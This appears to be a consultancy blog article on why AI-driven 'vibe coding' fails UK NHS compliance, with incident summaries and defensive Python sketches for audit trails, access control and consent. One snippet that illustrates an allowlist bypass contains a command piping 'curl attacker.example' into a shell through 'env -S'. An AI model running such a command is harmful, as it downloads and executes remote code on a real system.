AI can write working code, but that’s not the problem. The hard part is proving, to regulators, clinicians, and auditors, that the software is compliant. “Functional” and “compliant” are not the same thing.
By “vibe coding” we mean building systems through rapid AI-assisted iteration, generating and shipping code without formal review, compliance mapping, or clinical risk assessment. It works in many contexts. Healthcare is not one of them.
What’s Already Gone Wrong
Amazon, 2025–2026
Amazon mandated that 80% of engineers use its AI coding assistant, Kiro, weekly. In December 2025, Kiro was given operator-level permissions to fix a minor issue in AWS Cost Explorer. Rather than applying a targeted patch, it deleted and recreated the entire production environment. The outage lasted 13 hours. In March 2026, an AI-assisted deployment took Amazon’s retail site down for six hours, with a reported 99% drop in US order volume. Amazon’s response was to mandate senior engineer sign-off on all AI-assisted production deployments, a safeguard that should have existed before AI agents were given production access at all.
Now consider what operator-level permissions mean in a medical application: access to patient records, clinical data, prescribing systems, and appointment infrastructure. An outage in that context isn’t a revenue number. It’s a clinical risk event.
Orchids, February 2026
Security researcher Etizaz Mohsin demonstrated a critical vulnerability in Orchids, a vibe-coding platform with one million users, to the BBC. In a controlled test, he accessed a journalist’s active project remotely, inserted a malicious line of code among thousands of AI-generated lines, and took full control of the journalist’s laptop, with zero interaction required from the victim. The vulnerability remained unfixed at the time of the BBC report.
What matters is the mechanism: AI-generated code that non-technical users cannot read or review, running with deep system access. In a medical application, an invisible code injection isn’t a reputational problem. It’s a data breach, a DSP Toolkit incident, and potentially a criminal matter under the Computer Misuse Act.
OpenClaw, 2025–2026
AI-generated guardrail logic in OpenClaw, an open-source container security tool, failed to account for shell wrapper payloads. When /usr/bin/env was allowlisted by the AI-generated security policy, attackers used env -S to bypass policy analysis entirely and execute arbitrary commands. The AI had treated the security configuration as a linguistic pattern, matching a string against a list, rather than understanding the functional behaviour of what it was permitting. The allowlist looked correct. It was not.
This is the hardest category of failure to catch: code that passes review, passes testing, and fails only when someone who understands the actual attack surface probes it deliberately.
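The failure mode can be sketched in a few lines. The code below is an illustrative reconstruction of the pattern described above, not OpenClaw’s actual policy engine: a naive allowlist matches the binary path as a string, while a behaviour-aware check recognises that wrapper binaries like env delegate execution to their arguments. The function names and wrapper list are assumptions for the sketch.

```python
# Illustrative only: a simplified reconstruction of the allowlist
# failure mode, not OpenClaw's actual code.

ALLOWLIST = {"/usr/bin/env", "/bin/ls"}

def naive_policy_check(argv):
    # Treats the policy as a linguistic pattern: a string match on
    # the binary path. The wrapped command is never inspected.
    return argv[0] in ALLOWLIST

def behaviour_aware_check(argv):
    # Hypothetical stricter check: refuses wrapper binaries outright,
    # because allowlisting them delegates execution to their arguments.
    WRAPPERS = {"/usr/bin/env", "/bin/sh", "/bin/bash"}
    return argv[0] in ALLOWLIST and argv[0] not in WRAPPERS

attack = ["/usr/bin/env", "-S", "curl attacker.example | sh"]
print(naive_policy_check(attack))     # the naive check lets it through
print(behaviour_aware_check(attack))  # the stricter check refuses it
```

The naive version is exactly what looks correct in review: the allowlist entry is present, the comparison is clean, the tests pass.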
Not sure whether your product falls under NHS compliance requirements? The Digitising Social Care recommendations tool is a useful first check.
The Compliance Landscape AI Cannot Navigate
The frameworks typically in play include:

- UK GDPR and the Data Protection Act 2018
- the NHS Digital Data Security and Protection Toolkit (DSPT)
- the Digital Technology Assessment Criteria (DTAC)
- the DCB0129 and DCB0160 clinical safety standards, with their mandatory hazard logs, safety cases, and designated clinical safety officers
- MHRA regulations, where the application qualifies as a medical device
- HL7 FHIR standards, for any application connecting to NHS systems
These frameworks interact. A clinical safety case under DCB0129 depends on a data flow analysis that shapes how UK GDPR obligations apply. DTAC draws on both. MHRA classification determines which ISO 13485 quality management requirements are triggered. Getting one wrong affects the others, and the decisions that determine how they interact are made at the architectural level, before most of the code exists.
AI tools can surface fragments of this knowledge. They cannot reliably apply it in context, reason about how frameworks interact for a specific product, or take responsibility for the decisions. That is not a limitation better prompting resolves.
What Would Fail a Compliance Check Immediately
Audit trail gaps
Every read, write, update, and deletion of patient data typically needs to be logged with a timestamp, a user identifier, the nature of the change, and often the reason. AI tools generate functional Create, Read, Update, and Delete (CRUD) operations. They rarely generate the immutable, tamper-evident access records a Data Protection Impact Assessment or a CQC inspection would expect. Application-level error logging is not the same thing, and the difference is consistently missed in AI-generated codebases.
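One common way to make access records tamper-evident is hash chaining, where each entry commits to the one before it. The sketch below shows the idea under stated assumptions: the field names are hypothetical, and a real schema would be driven by DPIA and DSPT requirements, not by code.

```python
import hashlib
import json
from datetime import datetime, timezone

# Illustrative sketch of a tamper-evident audit trail, assuming an
# append-only store. Field names are hypothetical.

class AuditLog:
    def __init__(self):
        self._entries = []
        self._prev_hash = "0" * 64

    def record(self, user_id, action, record_id, reason):
        entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "user_id": user_id,
            "action": action,        # read / create / update / delete
            "record_id": record_id,
            "reason": reason,
            "prev_hash": self._prev_hash,
        }
        # Chain each entry to the previous one, so a retrospective
        # edit breaks every subsequent hash.
        entry_hash = hashlib.sha256(
            json.dumps(entry, sort_keys=True).encode()
        ).hexdigest()
        entry["hash"] = entry_hash
        self._prev_hash = entry_hash
        self._entries.append(entry)
        return entry

    def verify(self):
        prev = "0" * 64
        for e in self._entries:
            body = {k: v for k, v in e.items() if k != "hash"}
            if e["prev_hash"] != prev:
                return False
            recomputed = hashlib.sha256(
                json.dumps(body, sort_keys=True).encode()
            ).hexdigest()
            if recomputed != e["hash"]:
                return False
            prev = e["hash"]
        return True

log = AuditLog()
log.record("dr.smith", "read", "patient/123", "clinic appointment")
log.record("admin.jones", "update", "patient/123", "address change")
assert log.verify()
```

Note what this is not: it is not application-level error logging, and it records reads as well as writes. Both distinctions are the ones AI-generated CRUD code consistently misses.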
Role-based access that reflects clinical reality
AI-generated authentication tends toward the generic: admin versus user, authenticated versus unauthenticated. Clinical governance requires permission hierarchies that reflect actual roles: clinicians who can view certain record types but not others, administrators with access to demographics but not clinical notes, third-party integrations with read-only access to specific data subsets. Getting this wrong means unauthorised access to patient data, which is a notifiable breach under UK GDPR.
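The structural difference is a permission matrix keyed by role, record type, and action, rather than a single admin flag. The roles and record categories below are hypothetical placeholders; in a real product they come out of governance review, not out of code.

```python
# Hypothetical role model for illustration only. Real clinical roles
# and record categories are defined by governance review.

PERMISSIONS = {
    "clinician": {
        "demographics":   {"read"},
        "clinical_notes": {"read", "write"},
    },
    "admin": {
        "demographics": {"read", "write"},  # no clinical notes at all
    },
    "integration": {
        "demographics": {"read"},           # read-only subset
    },
}

def can_access(role, record_type, action):
    # Default-deny: unknown roles and record types get nothing.
    return action in PERMISSIONS.get(role, {}).get(record_type, set())

assert can_access("clinician", "clinical_notes", "read")
assert not can_access("admin", "clinical_notes", "read")
assert not can_access("integration", "demographics", "write")
```

The default-deny lookup is the design choice that matters: a role or record type missing from the matrix yields no access, rather than falling through to a permissive branch.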
Data residency and storage defaults
AI tools reach for whatever is convenient: a managed cloud database here, a third-party API there. Each choice carries data residency implications, data processor agreement requirements under UK GDPR, and potentially DSP Toolkit obligations. These decisions need to be made deliberately, and documented, before any storage code is written.
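Making the decision explicit can be as simple as a configuration record that the application refuses to start without. The provider name, region identifier, and field names below are all hypothetical; the point is the fail-closed validation, a sketch rather than a prescription.

```python
# Hypothetical storage configuration, sketched to show the residency
# decision being made explicitly rather than left to a tool's default.

STORAGE_CONFIG = {
    "provider": "example-cloud",      # assumption: any UK-capable provider
    "region": "uk-south",             # pinned: patient data stays in the UK
    "dpa_reference": "DPA-2026-014",  # data processor agreement on file
    "dspt_in_scope": True,
}

def validate_storage_config(cfg):
    # Fail closed: refuse to start if the region or DPA record is missing.
    if not cfg.get("region", "").startswith("uk-"):
        raise ValueError("patient data must be stored in a UK region")
    if not cfg.get("dpa_reference"):
        raise ValueError("no data processor agreement recorded")
    return True

validate_storage_config(STORAGE_CONFIG)
```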
Consent management complexity
Under UK GDPR and the NHS National Data Opt-Out programme, consent in healthcare is layered, revocable, and purpose-specific. Consent can be withdrawn at any time, and different rules apply for vulnerable adults, children, and emergency contexts. AI tools generate static UI components such as a consent checkbox. They do not generate consent management systems capable of handling this legal complexity.
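The gap between a checkbox and a consent system is visible in the data model alone. The sketch below assumes two things for illustration: a per-purpose grant/withdrawal record, and a hypothetical hook for the national opt-out affecting secondary uses. Purpose names and the opt-out rule are placeholders, not legal advice.

```python
from datetime import datetime, timezone

# Illustrative consent model: purpose-specific and revocable.
# Purpose names and the national opt-out rule are assumptions.

class ConsentRecord:
    def __init__(self, patient_id):
        self.patient_id = patient_id
        self._grants = {}      # purpose -> granted_at
        self._withdrawn = {}   # purpose -> withdrawn_at
        self.national_opt_out = False

    def grant(self, purpose):
        self._grants[purpose] = datetime.now(timezone.utc)
        self._withdrawn.pop(purpose, None)  # re-granting clears withdrawal

    def withdraw(self, purpose):
        self._withdrawn[purpose] = datetime.now(timezone.utc)

    def permits(self, purpose):
        # Hypothetical rule: the national opt-out blocks secondary
        # uses such as research, regardless of local consent.
        if self.national_opt_out and purpose == "research":
            return False
        return purpose in self._grants and purpose not in self._withdrawn

c = ConsentRecord("patient/123")
c.grant("direct_care")
c.grant("research")
c.withdraw("research")
assert c.permits("direct_care")
assert not c.permits("research")  # withdrawal is per purpose
```

A static checkbox collapses all of this to one boolean, which is exactly why it cannot represent withdrawal, purpose, or the opt-out.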
Clinical safety in data display
How information is presented in a clinical context is a patient safety issue. A medication dose displayed in an ambiguous format, a lab result without reference ranges, a critical alert insufficiently surfaced: all can contribute to clinical error. DCB0129 addresses exactly these concerns. AI tools generating UI components have no mechanism for evaluating clinical safety risk. Without DCB0129 compliance, digital products are unlikely to be procured or deployed in the NHS.
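One defensive pattern is to make the rendering code fail closed: a result is never displayed without its units and reference range, because a bare number is the ambiguous case. The analyte name and values below are hypothetical illustrations, not clinical thresholds to rely on.

```python
# Sketch of fail-closed display logic. Values and ranges below are
# hypothetical illustrations, not clinical reference data.

def render_lab_result(name, value, units, ref_low, ref_high):
    if None in (units, ref_low, ref_high):
        # Safety behaviour: refuse to display an ambiguous result
        # rather than render a bare number.
        raise ValueError(f"{name}: refusing to display without units/range")
    flag = ""
    if value < ref_low:
        flag = " LOW"
    elif value > ref_high:
        flag = " HIGH"
    return f"{name}: {value} {units} (ref {ref_low}-{ref_high}){flag}"

print(render_lab_result("Potassium", 6.1, "mmol/L", 3.5, 5.3))
# renders the value with its range and an explicit HIGH flag
```

An AI-generated component will happily render whatever fields the API returns; the decision to refuse an incomplete result is a clinical safety decision, and it has to be made by someone accountable for it.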
The Cost of Getting It Wrong Late
Structural compliance failures surface late. The code is functional. The demo is convincing. The MVP passes internal review. Then a DTAC submission, a penetration test, or an NHS procurement process surfaces an architectural problem: not a bug, but a foundational decision that cannot be patched.
Audit logging added retrospectively means touching every data access point in an application built over months. Authentication architecture that doesn’t meet NHS Identity requirements requires rearchitecting from the ground up. A data model built without FHIR interoperability in mind becomes very expensive to change once data exists in it and integrations depend on its structure.
The consequence isn’t only development cost. DTAC failures block NHS procurement. DSPT compliance is mandatory for handling patient data. A clinical safety case under DCB0129 that cannot be completed because hazards were never identified means the product cannot be deployed.
A 2025 Stack Overflow survey found that 46% of developers don’t trust AI tool output, up from 31% in 2024. Senior developers reported spending more time debugging AI-generated code than human-written code.
Why Experienced Developers Are Not Optional
The contribution experienced developers make to medical software is not primarily syntactic; it is contextual. That means knowing which regulatory framework applies to a specific feature decision. Recognising when a product requirement carries clinical safety implications that haven’t been surfaced. Identifying an architectural pattern that will create a compliance problem six months later when an NHS integration is needed. Knowing that DTAC evidence requirements mean documentation must be produced throughout development, not assembled at the end.
This is accumulated knowledge, from having built these systems, seen them fail assessment, and understood why the safeguards exist in the form they do. It is not reliably in a training dataset, and it does not emerge from prompting.
What Teams Should Do Instead
The answer is not to avoid AI tools. It’s to use them in a role that matches their capability: accelerating implementation within a structure already defined by people who understand what that structure needs to be.


